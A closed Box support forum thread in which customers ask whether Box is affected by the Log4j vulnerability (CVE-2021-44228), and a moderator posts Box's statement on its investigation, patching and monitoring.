Welcome to the new Box Support website. Check out all the details here on what’s changed.

Comments

19 comments

  • Official comment
    France

    Hi Everyone, 

    A quick update regarding this issue:

    "On Dec 9th, 2021, security researchers published a report of a high risk "zero day" vulnerability (CVE-2021-44228) affecting a common software package (Apache Log4J). Box's security and engineering teams immediately began investigating the report and assessing our own systems for impact. At this time, there is no evidence that the Box Service and related systems were successfully exploited.

    While we determined that there were a few vulnerable versions of the package within the Box Service and Infrastructure, Box generally uses a version that wasn't vulnerable. The limited occurrence combined with Box's pre-existing layers of defensive measures maintained for our extensive compliance certifications and industry best practices, prevented the exploitation of any vulnerable versions of Log4J.

    While the instances of the vulnerability were not exploitable and limited, we quickly started and continue to patch services that contained the vulnerable package. As part of our response, we are taking the following additional steps:
    • Extensively reviewed all patched services for malicious behavior prior to patch application and continue to verify our security posture of the patched environment with our typical security exercises, including our Bug Bounty program, external and internal penetration testings, red team activities, etc.
    • Updated all our security devices with relevant Log4j signatures to detect and contain malicious activity related to this exploit where applicable.
    • Continuously monitor and analyze logs after patching is complete.
    • Keeping in touch with industry peers to collect intelligence and mitigation techniques to apply to our environment as needed.
    • Additional internal patching will continue over the next few days as we continue to scan extensively our environment to discover any vulnerable version of the package.
    • We are also in contact with our vendors as a part of our rigorous third-party risk management process to further assess any potential vulnerabilities or impact.
    Protecting our customers' data is our top priority and at this time there is no action that you need to take in regard to the Box platform. If we identify any malicious activity that might impact your data, we will immediately notify and work with your teams. For any specific concerns, please reach out to support.box.com or visit the Box Trust Center to learn more about our approach to security, privacy and compliance."
     
    Thanks again for your inquiries and we appreciate your partnership in this matter.
    Comment actions Permalink
  • Kyle Staley

    I am also looking for an official response from Box on this vulnerability. 

    Is the Box platform affected by CVE-2021-44228?

    1
    Comment actions Permalink
  • Jim Spohnholtz

    We are also looking for confirmation and an official response.

    Is the Box platform affected by CVE-2021-44228?

    0
    Comment actions Permalink
  • Jim Blahnik

    We are also looking for confirmation and an official response.

    Is the Box platform affected by CVE-2021-44228?

    0
    Comment actions Permalink
  • Carissa Bourdon

    I am also interested in a response from Box.com, we need to confirm that Box services are NOT vulnerable to the Log4j vulnerability (log4shell). 

    0
    Comment actions Permalink
  • Nico Spitsbaard

    We are also looking for confirmation and an official response.

    Is the Box platform affected by CVE-2021-44228?

    0
    Comment actions Permalink
  • Robert Fernandes

    Hello, Box needs to come out with an official statement regarding the log4j vulnerability. Most major vendors have been very quick to respond to this, and I have not seen anything from Box yet. Is Box affected by this vulnerability?

    0
    Comment actions Permalink
  • Derek Harbin

    Agree to the above statement.

    0
    Comment actions Permalink
  • Gareth Sweeney

    Agree BOX need to make a statement on this.

    0
    Comment actions Permalink
  • Ian Roberts

    I totally agree... Would be nice to know if Box can attest that they have implemented the "Apache released Log4j version 2.15.0 security update to address this vulnerability." https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance  

    0
    Comment actions Permalink
  • Linda Ness

    Will BOX respond so that we know whether we are impacted the Apache log4j vulnerability CVE-2021-44228 please?

    0
    Comment actions Permalink
  • Patrick Chartrand

    We to are looking for an official response from Box on this as it's part of our security review.  Has anyone seen or know of an official response to this yet, as I can't seem to find one.

    0
    Comment actions Permalink
  • France

    Hi Everyone, 

    Welcome to the Box Community and thank you for your posts!

    We have been actively investigating the impact of Log4J on Box, and we have found no evidence of successful exploitation. We will share additional details soon. We're taking this review seriously and our teams are working to provide updates as we have them.

    You may also find Box's official statement regarding this matter on this blog post.

    Many thanks for your participation in the forum and let us know how else we can help!

    0
    Comment actions Permalink
  • Charles L curran

    Would also like update on this and link that was just posted I get a 404.

    0
    Comment actions Permalink
  • France

    Hi Charles, 

    I've fixed the link for you, can you try accessing it again.

    0
    Comment actions Permalink
  • evanoost

    Per our Security Scans, it does not seem the regular Box Drive application is vulnerable. However the Box DICOM Proxy seems to be reliant on log4j.

    0
    Comment actions Permalink
  • Erich Stephens

    Will Box be responding to this comment of 15 days ago, regarding the Box DICOM Proxy seems to be reliant on log4j ?

    0
    Comment actions Permalink
  • John Blatt

    Every other vendor I work with has issued a pretty detailed list of whether their products use Log4j and if it does where they are in patching or monitoring.  Not sure how much longer Box's thin statement will be acceptable to clients.

    0
    Comment actions Permalink
  • David Saelee

    Any update on this?  I need confirmation if Box Drive is affected by log4j.

    0
    Comment actions Permalink

Post is closed for comments.